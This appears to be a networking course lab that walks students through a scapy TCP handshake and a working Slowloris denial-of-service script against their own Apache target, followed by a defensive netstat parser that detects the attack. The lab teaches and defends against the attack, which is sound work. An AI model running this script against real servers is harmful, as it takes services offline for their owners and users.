On the Target Linux machine, in the Terminal window, execute the ifconfig command. Make a note of your IP address for later reference.
On the Target Linux machine, in the Terminal window, execute these commands:
service apache2 restart
watch "netstat -pant"
You should see a continuously updated list of network connections, as shown below on this page. Right now, there are no ESTABLISHED connections, only a listening process.
On your Target Linux machine, you should see an ESTABLISHED connection to the server on local port 80, as shown below on this page. If you don't see it, try refreshing the browser on the Attacker Linux machine.
On the Attacker Linux machine, open a Terminal window. In the Terminal window, execute this command:
iptables -L
If you see a rule in the OUTPUT section that drops RST packets, as shown below on this page, your firewall is correctly configured. This rule is needed because the kernel's own TCP stack never sent the SYN that scapy crafts, so without it the kernel would answer the server's SYN/ACK with a RST and tear down the connection before the script can complete the handshake. If the rule is not there, execute this command to add it:
iptables -A OUTPUT -p tcp --tcp-flags RST RST -j DROP
Then execute these commands to create the script in your home directory:
cd
nano handshake.py
In the nano window, type (or copy and paste) this script:
```python
#!/usr/bin/env python
# handshake.py: complete a TCP three-way handshake from scapy (Python 2 syntax, as in the lab)
import sys
from scapy.all import *

if len(sys.argv) != 3:
    print "Usage: ./handshake.py <target-ip> <source-port>"
    sys.exit(1)

target = sys.argv[1]
sp = int(sys.argv[2])

# IP layer addressed to the target
i = IP()
i.dst = target
print "IP layer prepared: ", i.summary()

# Step 1: SYN from our chosen source port to the web server on port 80
t = TCP()
t.dport = 80
t.sport = sp
t.flags = "S"
print "Sending TCP SYN Packet: ", t.summary()
ans = sr1(i/t)          # Step 2: wait for the server's SYN/ACK
if ans is None:
    print "No reply from target"
    sys.exit(1)
print "Reply was: ", ans.summary()

# Step 3: ACK the SYN/ACK using the server's sequence numbers, then push one byte of data
t.seq = ans.ack
t.ack = ans.seq + 1
t.flags = "A"
print "Sending TCP ACK Packet: ", t.summary()
ans = sr(i/t/"X")
```
Here is an image of the script:
Save the file with Ctrl+X, Y, Enter.
On the Attacker Linux machine, in the Terminal window, execute these commands. In the second command, replace the IP address with the address of your Linux Target machine:
chmod a+x handshake.py
./handshake.py 192.168.198.133 2000
On the Target Linux machine, you should see a connection from local port 80 to remote port 2000 appear. At first, it is in the ESTABLISHED state, but it rapidly changes to a FIN-WAIT state, as shown below on this page. Capture a screen image before the connection vanishes. If it vanishes before you can get the image, just repeat the ./handshake.py 192.168.198.133 2000 command.
Make sure you can see the ESTABLISHED or FIN-WAIT connection, from local port 80 to remote port 2000.
Save a screen image with the filename Proj X12a from Your Name.
On the Target Linux machine, open a new Terminal window and execute this command:
firefox localhost/server-status
You should see the Apache server status page, with only one request being processed, as shown below on this page:
nano slowloris.py
In the nano window, type (or copy and paste) this script. Replace YOUR NAME with your own name.
```python
#!/usr/bin/env python
# slowloris.py: open many connections and leave an incomplete GET on each (Python 2 syntax, as in the lab)
import sys
from scapy.all import *

if len(sys.argv) != 4:
    print "Usage: ./slowloris.py <target-ip> <starting-source-port> <number-of-GETs>"
    sys.exit(1)

target = sys.argv[1]
sp = int(sys.argv[2])
numgets = int(sys.argv[3])
print "Welcome to YOUR NAME's Slow Loris Attack with scapy!"
print "Attacking ", target, " with ", numgets, " GETs"

i = IP()
i.dst = target
print "IP layer prepared: ", i.summary()

# One handshake per source port. range() excludes its upper bound, so
# sp+numgets (not sp+numgets-1) sends exactly numgets GETs.
for s in range(sp, sp+numgets):
    t = TCP()
    t.dport = 80
    t.sport = s
    t.flags = "S"
    ans = sr1(i/t, verbose=0)       # SYN, wait for SYN/ACK
    t.seq = ans.ack
    t.ack = ans.seq + 1
    t.flags = "A"
    # The GET is deliberately incomplete: the final CRLF CRLF is never sent,
    # so the server keeps the request slot open waiting for the rest of the headers.
    get = "GET / HTTP/1.1\r\nHost: " + target
    ans = sr1(i/t/get, verbose=0)   # ACK carrying the partial request
    print "Port ", s, " attacked!"
print "Done!"
```
The script looks like this (split across two images):
This script is very similar to the handshake.py script. The only changes are that it loops through many source ports, and that on each connection it sends an HTTP GET that is incomplete because it is missing the final carriage return and line feed, so the server keeps waiting for the rest of the request.
On the Attacker Linux machine, in the Terminal window, execute these commands. In the second command, replace the IP address with the address of your Linux Target machine:
chmod a+x slowloris.py
./slowloris.py 192.168.198.133 3000 1000
On the Target Linux machine, in the Firefox window, click the Refresh button every few seconds. The grid should be filling with letters as the attack uses up all available connections. Your screen should look like the image below on this page:
Make sure you can see the grid, showing at least 10 letters.
Save a screen image with the filename Proj X12b from Your Name.
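A defender-side check, added here as an example and not part of the original project: it parses the kind of `netstat -pant` output watched on the Target and flags remote addresses holding many port-80 connections open, also reporting how many of their source ports are consecutive, which is the pattern the loop above leaves behind. The attacker address 192.168.198.130 and the sample rows are constructed, not captured.

```python
import re
from collections import defaultdict

# Constructed sample of the Target's `netstat -pant` output during the lab, not a real capture.
# Assumed attacker address 192.168.198.130 holds port 80 open from consecutive source ports.
SAMPLE_NETSTAT = """\
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      1234/apache2
tcp        0      0 192.168.198.133:80      192.168.198.130:3000    ESTABLISHED 1234/apache2
tcp        0      0 192.168.198.133:80      192.168.198.130:3001    ESTABLISHED 1234/apache2
tcp        0      0 192.168.198.133:80      192.168.198.130:3002    FIN_WAIT2   -
tcp        0      0 192.168.198.133:80      192.168.198.130:3003    ESTABLISHED 1234/apache2
tcp        0      0 192.168.198.133:80      10.0.0.5:51234          ESTABLISHED 1234/apache2
"""

# proto, Recv-Q, Send-Q, local addr:port, foreign addr:port, state; a LISTEN row has port '*'
ROW_RE = re.compile(r"^tcp6?\s+\d+\s+\d+\s+(\S+):(\d+|\*)\s+(\S+):(\d+|\*)\s+(\S+)")

def parse_netstat(text):
    """Yield (local_ip, local_port, remote_ip, remote_port, state); a '*' port becomes None."""
    for line in text.splitlines():
        m = ROW_RE.match(line)
        if m:
            lip, lport, rip, rport, state = m.groups()
            yield (lip, None if lport == "*" else int(lport),
                   rip, None if rport == "*" else int(rport), state)

def ports_by_peer(text, local_port=80, states=("ESTABLISHED",)):
    """Map each remote IP to the sorted source ports it is holding open to local_port."""
    peers = defaultdict(list)
    for _, lport, rip, rport, state in parse_netstat(text):
        if lport == local_port and state in states:
            peers[rip].append(rport)
    return {ip: sorted(ports) for ip, ports in peers.items()}

def longest_consecutive_run(ports):
    """Longest run of adjacent port numbers (the scapy loop walks sp, sp+1, sp+2, ...)."""
    best = run = 0
    for prev, cur in zip([None] + list(ports), ports):
        run = run + 1 if prev is not None and cur == prev + 1 else 1
        best = max(best, run)
    return best

def suspicious_peers(text, local_port=80, threshold=3):
    """Remote IPs with >= threshold open connections: {ip: (count, longest consecutive run)}."""
    return {ip: (len(ports), longest_consecutive_run(ports))
            for ip, ports in ports_by_peer(text, local_port).items()
            if len(ports) >= threshold}
```

In the lab, feed it the real output with `netstat -pant` piped to the script; a single peer with a count near Apache's worker limit and a long consecutive port run is the condition to alert on.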
Email the images to cnit.123@gmail.com with a Subject line of Proj X12 from Your Name.